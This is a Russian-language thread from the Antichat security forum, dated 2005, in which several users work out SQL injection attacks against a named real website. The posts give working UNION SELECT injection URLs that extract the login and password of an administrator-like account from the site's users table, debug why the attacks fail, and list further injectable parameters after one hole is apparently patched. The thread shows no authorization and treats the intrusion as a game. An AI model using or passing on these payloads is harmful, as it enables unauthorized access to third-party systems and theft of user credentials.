ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Sql иньекция в nepom.ru
  #1  
Старый 04.10.2005, 07:47
Thief
Познающий
Регистрация: 03.08.2004
Сообщений: 52
Провел на форуме:
68289

Репутация: 2
Question Sql иньекция в nepom.ru

Коротко и ясно уязвимость обнаружел на http://nepom.ru/users/?login=' Далее не могу понять как открыть таблицы Вродебы пишу всё правильно.
Пример http://nepom.ru/users/?login=-1%20UN...ll,null%20FROM w3t Users WHERE U_Username='admin'/*
ИТД помогите разобраться....
 

  #2  
Старый 04.10.2005, 15:26
bul666
Banned
Регистрация: 21.04.2005
Сообщений: 328
Провел на форуме:
632524

Репутация: 9
Отправить сообщение для bul666 с помощью ICQ
По умолчанию

А от куда ты знаешь имена таблиц?
 

  #3  
Старый 04.10.2005, 15:51
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию

1. У тебя неправильный синтаксис: после -1 нужно ставить ', а потом комментировать т.к. в запросе значение взято в кавычки.
2. Ты выбираешь 5 столбцов, когда там нужно всего один.
3. Нет вывода результата, поэтому посмотреть пароль не получится.
Поэтому тебе нужно искать другую sql-инъекцию
Если бы был вывод, правильный запрос был бы вот такой:
Цитата:
http://nepom.ru/users/?login=-1'%20UNION%20SELECT%20passwd%20FROM%20users/*
 

  #4  
Старый 04.10.2005, 16:01
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию

Вот тебе настоящая sql-инъекция!
Цитата:
http://nepom.ru/interest/full.php?id=-1'%20UNION%20SELECT%201,2,login,id,passwd,6,7,8,9% 20FROM%20users%20where%20login='ChatAdmin'/*
Сейчас только логины менять

Последний раз редактировалось virgoz; 04.10.2005 в 16:04..
 

  #5  
Старый 04.10.2005, 16:26
Thief
Познающий
Регистрация: 03.08.2004
Сообщений: 52
Провел на форуме:
68289

Репутация: 2
По умолчанию

Цитата:
http://nepom.ru/interest/full.php?id=-1'%20UNION%20SELECT%201,2,login,id,passwd,6,7,8,9% 20FROM%20users%20where%20login='ChatAdmin'/*
SQL скорее всего не получиться... т.к. он выбирает id, а id скорее всего INTEGER, а пароль VARCHAR.... скорее всего... поэтому UNION не работает... выбор идет только по одному INTEGER полю
Если вам не лень посмотрите может я ошибаюсь... Спасибо!
 

  #6  
Старый 04.10.2005, 16:43
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию

Вот так:
Цитата:
http://nepom.ru/interest/full.php?id=-1'+UNION+SELECT+1,2,login,id,passwd,6,7,8,9+FROM+u sers+where+login='ChatAdmin'/*
!!! Когда будете вставлять, в слове "u sers" уберите пробел

Последний раз редактировалось virgoz; 04.10.2005 в 16:50..
 

  #7  
Старый 06.10.2005, 06:27
Morph
Постоянный
Регистрация: 13.08.2004
Сообщений: 957
Провел на форуме:
1770063

Репутация: 429


По умолчанию

Ххыхыхыхых хеш 123
 

  #8  
Старый 06.10.2005, 09:05
Thief
Познающий
Регистрация: 03.08.2004
Сообщений: 52
Провел на форуме:
68289

Репутация: 2
По умолчанию

http://nepom.ru/interest/full.php?id=-1'+UNION+SELECT+1,2,login,id,passwd,6,7,8,9+FROM+u sers+where+login='ChatAdmin'/*
Выполняю данный запрос 1 назад всё работоло сей час что-то не работает видать нашли багу. Ктонить может обьяснить что произошло.....
 

  #9  
Старый 06.10.2005, 09:32
Deem3n®
Постоянный
Регистрация: 19.09.2005
Сообщений: 408
Провел на форуме:
3730496

Репутация: 519
По умолчанию

багу прикрыли

а http://nepom.ru/users/?login=' еще работает
 

  #10  
Старый 06.10.2005, 09:34
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

лично у меня ваще высветило что страницы full.php нету
попробуй на других страницах типа
http://nepom.ru/interest/?raz=1%27
http://nepom.ru/users/?login=%27
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ